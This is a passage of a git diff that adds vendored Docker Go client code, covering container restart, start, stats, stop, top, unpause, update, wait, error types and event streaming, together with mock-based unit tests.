-0,0 +1,22 @@ +package client + +import ( + "net/url" + "time" + + timetypes "github.com/docker/docker/api/types/time" + "golang.org/x/net/context" +) + +// ContainerRestart stops and starts a container again. +// It makes the daemon to wait for the container to be up again for +// a specific amount of time, given the timeout. +func (cli *Client) ContainerRestart(ctx context.Context, containerID string, timeout *time.Duration) error { + query := url.Values{} + if timeout != nil { + query.Set("t", timetypes.DurationToSecondsString(*timeout)) + } + resp, err := cli.post(ctx, "/containers/"+containerID+"/restart", query, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/container_restart_test.go b/vendor/github.com/docker/docker/client/container_restart_test.go new file mode 100644 index 0000000000..8c3cfd6a6f --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_restart_test.go @@ -0,0 +1,48 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + "time" + + "golang.org/x/net/context" +) + +func TestContainerRestartError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + timeout := 0 * time.Second + err := client.ContainerRestart(context.Background(), "nothing", &timeout) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerRestart(t *testing.T) { + expectedURL := "/containers/container_id/restart" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + t := req.URL.Query().Get("t") + if t != "100" { + return nil, fmt.Errorf("t (timeout) not set in URL query properly. Expected '100', got %s", t) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + timeout := 100 * time.Second + err := client.ContainerRestart(context.Background(), "container_id", &timeout) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_start.go b/vendor/github.com/docker/docker/client/container_start.go new file mode 100644 index 0000000000..b1f08de416 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_start.go @@ -0,0 +1,24 @@ +package client + +import ( + "net/url" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" +) + +// ContainerStart sends a request to the docker daemon to start a container. +func (cli *Client) ContainerStart(ctx context.Context, containerID string, options types.ContainerStartOptions) error { + query := url.Values{} + if len(options.CheckpointID) != 0 { + query.Set("checkpoint", options.CheckpointID) + } + if len(options.CheckpointDir) != 0 { + query.Set("checkpoint-dir", options.CheckpointDir) + } + + resp, err := cli.post(ctx, "/containers/"+containerID+"/start", query, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/container_start_test.go b/vendor/github.com/docker/docker/client/container_start_test.go new file mode 100644 index 0000000000..5826fa8bc7 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_start_test.go @@ -0,0 +1,58 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" +) + +func TestContainerStartError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + err := client.ContainerStart(context.Background(), "nothing", types.ContainerStartOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerStart(t *testing.T) { + expectedURL := "/containers/container_id/start" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + // we're not expecting any payload, but if one is supplied, check it is valid. + if req.Header.Get("Content-Type") == "application/json" { + var startConfig interface{} + if err := json.NewDecoder(req.Body).Decode(&startConfig); err != nil { + return nil, fmt.Errorf("Unable to parse json: %s", err) + } + } + + checkpoint := req.URL.Query().Get("checkpoint") + if checkpoint != "checkpoint_id" { + return nil, fmt.Errorf("checkpoint not set in URL query properly. Expected 'checkpoint_id', got %s", checkpoint) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.ContainerStart(context.Background(), "container_id", types.ContainerStartOptions{CheckpointID: "checkpoint_id"}) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_stats.go b/vendor/github.com/docker/docker/client/container_stats.go new file mode 100644 index 0000000000..4758c66e32 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_stats.go @@ -0,0 +1,26 @@ +package client + +import ( + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ContainerStats returns near realtime stats for a given container. +// It's up to the caller to close the io.ReadCloser returned. +func (cli *Client) ContainerStats(ctx context.Context, containerID string, stream bool) (types.ContainerStats, error) { + query := url.Values{} + query.Set("stream", "0") + if stream { + query.Set("stream", "1") + } + + resp, err := cli.get(ctx, "/containers/"+containerID+"/stats", query, nil) + if err != nil { + return types.ContainerStats{}, err + } + + osType := getDockerOS(resp.header.Get("Server")) + return types.ContainerStats{Body: resp.body, OSType: osType}, err +} diff --git a/vendor/github.com/docker/docker/client/container_stats_test.go b/vendor/github.com/docker/docker/client/container_stats_test.go new file mode 100644 index 0000000000..7414f135c3 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_stats_test.go @@ -0,0 +1,70 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestContainerStatsError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerStats(context.Background(), "nothing", false) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerStats(t *testing.T) { + expectedURL := "/containers/container_id/stats" + cases := []struct { + stream bool + expectedStream string + }{ + { + expectedStream: "0", + }, + { + stream: true, + expectedStream: "1", + }, + } + for _, c := range cases { + client := &Client{ + client: newMockClient(func(r *http.Request) (*http.Response, error) { + if !strings.HasPrefix(r.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + } + + query := r.URL.Query() + stream := query.Get("stream") + if stream != c.expectedStream { + return nil, fmt.Errorf("stream not set in URL query properly. Expected '%s', got %s", c.expectedStream, stream) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("response"))), + }, nil + }), + } + resp, err := client.ContainerStats(context.Background(), "container_id", c.stream) + if err != nil { + t.Fatal(err) + } + defer resp.Body.Close() + content, err := ioutil.ReadAll(resp.Body) + if err != nil { + t.Fatal(err) + } + if string(content) != "response" { + t.Fatalf("expected response to contain 'response', got %s", string(content)) + } + } +} diff --git a/vendor/github.com/docker/docker/client/container_stop.go b/vendor/github.com/docker/docker/client/container_stop.go new file mode 100644 index 0000000000..b5418ae8c8 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_stop.go @@ -0,0 +1,21 @@ +package client + +import ( + "net/url" + "time" + + timetypes "github.com/docker/docker/api/types/time" + "golang.org/x/net/context" +) + +// ContainerStop stops a container without terminating the process. +// The process is blocked until the container stops or the timeout expires. +func (cli *Client) ContainerStop(ctx context.Context, containerID string, timeout *time.Duration) error { + query := url.Values{} + if timeout != nil { + query.Set("t", timetypes.DurationToSecondsString(*timeout)) + } + resp, err := cli.post(ctx, "/containers/"+containerID+"/stop", query, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/container_stop_test.go b/vendor/github.com/docker/docker/client/container_stop_test.go new file mode 100644 index 0000000000..c32cd691c4 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_stop_test.go @@ -0,0 +1,48 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + "time" + + "golang.org/x/net/context" +) + +func TestContainerStopError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + timeout := 0 * time.Second + err := client.ContainerStop(context.Background(), "nothing", &timeout) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerStop(t *testing.T) { + expectedURL := "/containers/container_id/stop" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + t := req.URL.Query().Get("t") + if t != "100" { + return nil, fmt.Errorf("t (timeout) not set in URL query properly. Expected '100', got %s", t) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + timeout := 100 * time.Second + err := client.ContainerStop(context.Background(), "container_id", &timeout) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_top.go b/vendor/github.com/docker/docker/client/container_top.go new file mode 100644 index 0000000000..4e7270ea22 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_top.go @@ -0,0 +1,28 @@ +package client + +import ( + "encoding/json" + "net/url" + "strings" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ContainerTop shows process information from within a container. +func (cli *Client) ContainerTop(ctx context.Context, containerID string, arguments []string) (types.ContainerProcessList, error) { + var response types.ContainerProcessList + query := url.Values{} + if len(arguments) > 0 { + query.Set("ps_args", strings.Join(arguments, " ")) + } + + resp, err := cli.get(ctx, "/containers/"+containerID+"/top", query, nil) + if err != nil { + return response, err + } + + err = json.NewDecoder(resp.body).Decode(&response) + ensureReaderClosed(resp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/container_top_test.go b/vendor/github.com/docker/docker/client/container_top_test.go new file mode 100644 index 0000000000..7802be063e --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_top_test.go @@ -0,0 +1,74 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "reflect" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestContainerTopError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerTop(context.Background(), "nothing", []string{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerTop(t *testing.T) { + expectedURL := "/containers/container_id/top" + expectedProcesses := [][]string{ + {"p1", "p2"}, + {"p3"}, + } + expectedTitles := []string{"title1", "title2"} + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + args := query.Get("ps_args") + if args != "arg1 arg2" { + return nil, fmt.Errorf("args not set in URL query properly. Expected 'arg1 arg2', got %v", args) + } + + b, err := json.Marshal(types.ContainerProcessList{ + Processes: [][]string{ + {"p1", "p2"}, + {"p3"}, + }, + Titles: []string{"title1", "title2"}, + }) + if err != nil { + return nil, err + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + processList, err := client.ContainerTop(context.Background(), "container_id", []string{"arg1", "arg2"}) + if err != nil { + t.Fatal(err) + } + if !reflect.DeepEqual(expectedProcesses, processList.Processes) { + t.Fatalf("Processes: expected %v, got %v", expectedProcesses, processList.Processes) + } + if !reflect.DeepEqual(expectedTitles, processList.Titles) { + t.Fatalf("Titles: expected %v, got %v", expectedTitles, processList.Titles) + } +} diff --git a/vendor/github.com/docker/docker/client/container_unpause.go b/vendor/github.com/docker/docker/client/container_unpause.go new file mode 100644 index 0000000000..5c76211256 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_unpause.go @@ -0,0 +1,10 @@ +package client + +import "golang.org/x/net/context" + +// ContainerUnpause resumes the process execution within a container +func (cli *Client) ContainerUnpause(ctx context.Context, containerID string) error { + resp, err := cli.post(ctx, "/containers/"+containerID+"/unpause", nil, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/container_unpause_test.go b/vendor/github.com/docker/docker/client/container_unpause_test.go new file mode 100644 index 0000000000..2c42727191 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_unpause_test.go @@ -0,0 +1,41 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestContainerUnpauseError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + err := client.ContainerUnpause(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerUnpause(t *testing.T) { + expectedURL := "/containers/container_id/unpause" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + err := client.ContainerUnpause(context.Background(), "container_id") + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_update.go b/vendor/github.com/docker/docker/client/container_update.go new file mode 100644 index 0000000000..5082f22dfa --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_update.go @@ -0,0 +1,22 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types/container" + "golang.org/x/net/context" +) + +// ContainerUpdate updates resources of a container +func (cli *Client) ContainerUpdate(ctx context.Context, containerID string, updateConfig container.UpdateConfig) (container.ContainerUpdateOKBody, error) { + var response container.ContainerUpdateOKBody + serverResp, err := cli.post(ctx, "/containers/"+containerID+"/update", nil, updateConfig, nil) + if err != nil { + return response, err + } + + err = json.NewDecoder(serverResp.body).Decode(&response) + + ensureReaderClosed(serverResp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/container_update_test.go b/vendor/github.com/docker/docker/client/container_update_test.go new file mode 100644 index 0000000000..715bb7ca23 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_update_test.go @@ -0,0 +1,58 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types/container" + "golang.org/x/net/context" +) + +func TestContainerUpdateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerUpdate(context.Background(), "nothing", container.UpdateConfig{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerUpdate(t *testing.T) { + expectedURL := "/containers/container_id/update" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + + b, err := json.Marshal(container.ContainerUpdateOKBody{}) + if err != nil { + return nil, err + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + _, err := client.ContainerUpdate(context.Background(), "container_id", container.UpdateConfig{ + Resources: container.Resources{ + CPUPeriod: 1, + }, + RestartPolicy: container.RestartPolicy{ + Name: "always", + }, + }) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_wait.go b/vendor/github.com/docker/docker/client/container_wait.go new file mode 100644 index 0000000000..93212c70ee --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_wait.go @@ -0,0 +1,26 @@ +package client + +import ( + "encoding/json" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/container" +) + +// ContainerWait pauses execution until a container exits. +// It returns the API status code as response of its readiness. +func (cli *Client) ContainerWait(ctx context.Context, containerID string) (int64, error) { + resp, err := cli.post(ctx, "/containers/"+containerID+"/wait", nil, nil, nil) + if err != nil { + return -1, err + } + defer ensureReaderClosed(resp) + + var res container.ContainerWaitOKBody + if err := json.NewDecoder(resp.body).Decode(&res); err != nil { + return -1, err + } + + return res.StatusCode, nil +} diff --git a/vendor/github.com/docker/docker/client/container_wait_test.go b/vendor/github.com/docker/docker/client/container_wait_test.go new file mode 100644 index 0000000000..9300bc0a54 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_wait_test.go @@ -0,0 +1,70 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "log" + "net/http" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types/container" + + "golang.org/x/net/context" +) + +func TestContainerWaitError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + code, err := client.ContainerWait(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } + if code != -1 { + t.Fatalf("expected a status code equal to '-1', got %d", code) + } +} + +func TestContainerWait(t *testing.T) { + expectedURL := "/containers/container_id/wait" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + b, err := json.Marshal(container.ContainerWaitOKBody{ + StatusCode: 15, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + code, err := client.ContainerWait(context.Background(), "container_id") + if err != nil { + t.Fatal(err) + } + if code != 15 { + t.Fatalf("expected a status code equal to '15', got %d", code) + } +} + +func ExampleClient_ContainerWait_withTimeout() { + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + + client, _ := NewEnvClient() + _, err := client.ContainerWait(ctx, "container_id") + if err != nil { + log.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/disk_usage.go b/vendor/github.com/docker/docker/client/disk_usage.go new file mode 100644 index 0000000000..03c80b39af --- /dev/null +++ b/vendor/github.com/docker/docker/client/disk_usage.go @@ -0,0 +1,26 @@ +package client + +import ( + "encoding/json" + "fmt" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// DiskUsage requests the current data usage from the daemon +func (cli *Client) DiskUsage(ctx context.Context) (types.DiskUsage, error) { + var du types.DiskUsage + + serverResp, err := cli.get(ctx, "/system/df", nil, nil) + if err != nil { + return du, err + } + defer ensureReaderClosed(serverResp) + + if err := json.NewDecoder(serverResp.body).Decode(&du); err != nil { + return du, fmt.Errorf("Error retrieving disk usage: %v", err) + } + + return du, nil +} diff --git a/vendor/github.com/docker/docker/client/errors.go b/vendor/github.com/docker/docker/client/errors.go new file mode 100644 index 0000000000..bf6923f134 --- /dev/null +++ b/vendor/github.com/docker/docker/client/errors.go @@ -0,0 +1,278 @@ +package client + +import ( + "fmt" + + "github.com/docker/docker/api/types/versions" + "github.com/pkg/errors" +) + +// errConnectionFailed implements an error returned when connection failed. +type errConnectionFailed struct { + host string +} + +// Error returns a string representation of an errConnectionFailed +func (err errConnectionFailed) Error() string { + if err.host == "" { + return "Cannot connect to the Docker daemon. Is the docker daemon running on this host?" + } + return fmt.Sprintf("Cannot connect to the Docker daemon at %s. Is the docker daemon running?", err.host) +} + +// IsErrConnectionFailed returns true if the error is caused by connection failed. +func IsErrConnectionFailed(err error) bool { + _, ok := errors.Cause(err).(errConnectionFailed) + return ok +} + +// ErrorConnectionFailed returns an error with host in the error message when connection to docker daemon failed. +func ErrorConnectionFailed(host string) error { + return errConnectionFailed{host: host} +} + +type notFound interface { + error + NotFound() bool // Is the error a NotFound error +} + +// IsErrNotFound returns true if the error is caused with an +// object (image, container, network, volume, …) is not found in the docker host. +func IsErrNotFound(err error) bool { + te, ok := err.(notFound) + return ok && te.NotFound() +} + +// imageNotFoundError implements an error returned when an image is not in the docker host. +type imageNotFoundError struct { + imageID string +} + +// NotFound indicates that this error type is of NotFound +func (e imageNotFoundError) NotFound() bool { + return true +} + +// Error returns a string representation of an imageNotFoundError +func (e imageNotFoundError) Error() string { + return fmt.Sprintf("Error: No such image: %s", e.imageID) +} + +// IsErrImageNotFound returns true if the error is caused +// when an image is not found in the docker host. +func IsErrImageNotFound(err error) bool { + return IsErrNotFound(err) +} + +// containerNotFoundError implements an error returned when a container is not in the docker host. +type containerNotFoundError struct { + containerID string +} + +// NotFound indicates that this error type is of NotFound +func (e containerNotFoundError) NotFound() bool { + return true +} + +// Error returns a string representation of a containerNotFoundError +func (e containerNotFoundError) Error() string { + return fmt.Sprintf("Error: No such container: %s", e.containerID) +} + +// IsErrContainerNotFound returns true if the error is caused +// when a container is not found in the docker host. +func IsErrContainerNotFound(err error) bool { + return IsErrNotFound(err) +} + +// networkNotFoundError implements an error returned when a network is not in the docker host. +type networkNotFoundError struct { + networkID string +} + +// NotFound indicates that this error type is of NotFound +func (e networkNotFoundError) NotFound() bool { + return true +} + +// Error returns a string representation of a networkNotFoundError +func (e networkNotFoundError) Error() string { + return fmt.Sprintf("Error: No such network: %s", e.networkID) +} + +// IsErrNetworkNotFound returns true if the error is caused +// when a network is not found in the docker host. +func IsErrNetworkNotFound(err error) bool { + return IsErrNotFound(err) +} + +// volumeNotFoundError implements an error returned when a volume is not in the docker host. +type volumeNotFoundError struct { + volumeID string +} + +// NotFound indicates that this error type is of NotFound +func (e volumeNotFoundError) NotFound() bool { + return true +} + +// Error returns a string representation of a volumeNotFoundError +func (e volumeNotFoundError) Error() string { + return fmt.Sprintf("Error: No such volume: %s", e.volumeID) +} + +// IsErrVolumeNotFound returns true if the error is caused +// when a volume is not found in the docker host. +func IsErrVolumeNotFound(err error) bool { + return IsErrNotFound(err) +} + +// unauthorizedError represents an authorization error in a remote registry. +type unauthorizedError struct { + cause error +} + +// Error returns a string representation of an unauthorizedError +func (u unauthorizedError) Error() string { + return u.cause.Error() +} + +// IsErrUnauthorized returns true if the error is caused +// when a remote registry authentication fails +func IsErrUnauthorized(err error) bool { + _, ok := err.(unauthorizedError) + return ok +} + +// nodeNotFoundError implements an error returned when a node is not found. +type nodeNotFoundError struct { + nodeID string +} + +// Error returns a string representation of a nodeNotFoundError +func (e nodeNotFoundError) Error() string { + return fmt.Sprintf("Error: No such node: %s", e.nodeID) +} + +// NotFound indicates that this error type is of NotFound +func (e nodeNotFoundError) NotFound() bool { + return true +} + +// IsErrNodeNotFound returns true if the error is caused +// when a node is not found. +func IsErrNodeNotFound(err error) bool { + _, ok := err.(nodeNotFoundError) + return ok +} + +// serviceNotFoundError implements an error returned when a service is not found. +type serviceNotFoundError struct { + serviceID string +} + +// Error returns a string representation of a serviceNotFoundError +func (e serviceNotFoundError) Error() string { + return fmt.Sprintf("Error: No such service: %s", e.serviceID) +} + +// NotFound indicates that this error type is of NotFound +func (e serviceNotFoundError) NotFound() bool { + return true +} + +// IsErrServiceNotFound returns true if the error is caused +// when a service is not found. +func IsErrServiceNotFound(err error) bool { + _, ok := err.(serviceNotFoundError) + return ok +} + +// taskNotFoundError implements an error returned when a task is not found. +type taskNotFoundError struct { + taskID string +} + +// Error returns a string representation of a taskNotFoundError +func (e taskNotFoundError) Error() string { + return fmt.Sprintf("Error: No such task: %s", e.taskID) +} + +// NotFound indicates that this error type is of NotFound +func (e taskNotFoundError) NotFound() bool { + return true +} + +// IsErrTaskNotFound returns true if the error is caused +// when a task is not found. +func IsErrTaskNotFound(err error) bool { + _, ok := err.(taskNotFoundError) + return ok +} + +type pluginPermissionDenied struct { + name string +} + +func (e pluginPermissionDenied) Error() string { + return "Permission denied while installing plugin " + e.name +} + +// IsErrPluginPermissionDenied returns true if the error is caused +// when a user denies a plugin's permissions +func IsErrPluginPermissionDenied(err error) bool { + _, ok := err.(pluginPermissionDenied) + return ok +} + +// NewVersionError returns an error if the APIVersion required +// if less than the current supported version +func (cli *Client) NewVersionError(APIrequired, feature string) error { + if versions.LessThan(cli.version, APIrequired) { + return fmt.Errorf("%q requires API version %s, but the Docker server is version %s", feature, APIrequired, cli.version) + } + return nil +} + +// secretNotFoundError implements an error returned when a secret is not found. +type secretNotFoundError struct { + name string +} + +// Error returns a string representation of a secretNotFoundError +func (e secretNotFoundError) Error() string { + return fmt.Sprintf("Error: no such secret: %s", e.name) +} + +// NoFound indicates that this error type is of NotFound +func (e secretNotFoundError) NotFound() bool { + return true +} + +// IsErrSecretNotFound returns true if the error is caused +// when a secret is not found. +func IsErrSecretNotFound(err error) bool { + _, ok := err.(secretNotFoundError) + return ok +} + +// pluginNotFoundError implements an error returned when a plugin is not in the docker host. +type pluginNotFoundError struct { + name string +} + +// NotFound indicates that this error type is of NotFound +func (e pluginNotFoundError) NotFound() bool { + return true +} + +// Error returns a string representation of a pluginNotFoundError +func (e pluginNotFoundError) Error() string { + return fmt.Sprintf("Error: No such plugin: %s", e.name) +} + +// IsErrPluginNotFound returns true if the error is caused +// when a plugin is not found in the docker host. +func IsErrPluginNotFound(err error) bool { + return IsErrNotFound(err) +} diff --git a/vendor/github.com/docker/docker/client/events.go b/vendor/github.com/docker/docker/client/events.go new file mode 100644 index 0000000000..af47aefa74 --- /dev/null +++ b/vendor/github.com/docker/docker/client/events.go @@ -0,0 +1,102 @@ +package client + +import ( + "encoding/json" + "net/url" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + timetypes "github.com/docker/docker/api/types/time" +) + +// Events returns a stream of events in the daemon. It's up to the caller to close the stream +// by cancelling the context. Once the stream has been completely read an io.EOF error will +// be sent over the error channel. If an error is sent all processing will be stopped. It's up +// to the caller to reopen the stream in the event of an error by reinvoking this method. +func (cli *Client) Events(ctx context.Context, options types.EventsOptions) (<-chan events.Message, <-chan error) { + + messages := make(chan events.Message) + errs := make(chan error, 1) + + started := make(chan struct{}) + go func() { + defer close(errs) + + query, err := buildEventsQueryParams(cli.version, options) + if err != nil { + close(started) + errs <- err + return + } + + resp, err := cli.get(ctx, "/events", query, nil) + if err != nil { + close(started) + errs <- err + return + } + defer resp.body.Close() + + decoder := json.NewDecoder(resp.body) + + close(started) + for { + select { + case <-ctx.Done(): + errs <- ctx.Err() + return + default: + var event events.Message + if err := decoder.Decode(&event); err != nil { + errs <- err + return + } + + select { + case messages <- event: + case <-ctx.Done(): + errs <- ctx.Err() + return + } + } + } + }() + <-started + + return messages, errs +} + +func buildEventsQueryParams(cliVersion string, options types.EventsOptions) (url.Values, error) { + query := url.Values{} + ref := time.Now() + + if options.Since != "" { + ts, err := timetypes.GetTimestamp(options.Since, ref) + if err != nil { + return nil, err + } + query.Set("since", ts) + } + + if options.Until != "" { + ts, err := timetypes.GetTimestamp(options.Until, ref) + if err != nil { + return nil, err + } + query.Set("until", ts) + } + + if options.Filters.Len() > 0 { + filterJSON, err := filters.ToParamWithVersion(cliVersion, options.Filters) + if err != nil { + return nil, err + } + query.Set("filters", filterJSON) + } + + return query, nil +} diff --git a/vendor/github.com/docker/docker/client/events_test.go b/vendor/github.com/docker/docker/client/events_test.go new file mode 100644 index 0000000000..ba82d2f542 --- /dev/null +++ b/vendor/github.com/docker/docker/client/events_test.go @@ -0,0 +1,165 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" +) + +func TestEventsErrorInOptions(t *testing.T) { + errorCases := []struct { + options types.EventsOptions + expectedError string + }{ + { + options: types.EventsOptions{ + Since: "2006-01-02TZ", + }, + expectedError: `parsing time "2006-01-02TZ"`, + }, + { + options: types.EventsOptions{ + Until: "2006-01-02TZ", + }, + expectedError: `parsing time "2006-01-02TZ"`, + }, + } + for _, e := range errorCases { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, errs := client.Events(context.Background(), e.options) + err := <-errs + if err == nil || !strings.Contains(err.Error(), e.expectedError) { + t.Fatalf("expected an error %q, got %v", e.expectedError, err) + } + } +} + +func TestEventsErrorFromServer(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, errs := client.Events(context.Background(), types.EventsOptions{}) + err := <-errs + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestEvents(t *testing.T) { + + expectedURL := "/events" + + filters := filters.NewArgs() + filters.Add("type", events.ContainerEventType) + expectedFiltersJSON := fmt.Sprintf(`{"type":{"%s":true}}`, events.ContainerEventType) + + eventsCases := []struct { + options types.EventsOptions + events []events.Message + expectedEvents map[string]bool + expectedQueryParams map[string]string + }{ + { + options: types.EventsOptions{ + Filters: filters, + }, + expectedQueryParams: map[string]string{ + "filters": expectedFiltersJSON, + }, + events: []events.Message{}, + expectedEvents: make(map[string]bool), + }, + { + options: types.EventsOptions{ + Filters: filters, + }, + expectedQueryParams: map[string]string{ + "filters": expectedFiltersJSON, + }, + events: []events.Message{ + { + Type: "container", + ID: "1", + Action: "create", + }, + { + Type: "container", + ID: "2", + Action: "die", + }, + { + Type: "container", + ID: "3", + Action: "create", + }, + }, + expectedEvents: map[string]bool{ + "1": true, + "2": true, + "3": true, + }, + }, + } + + for _, eventsCase := range 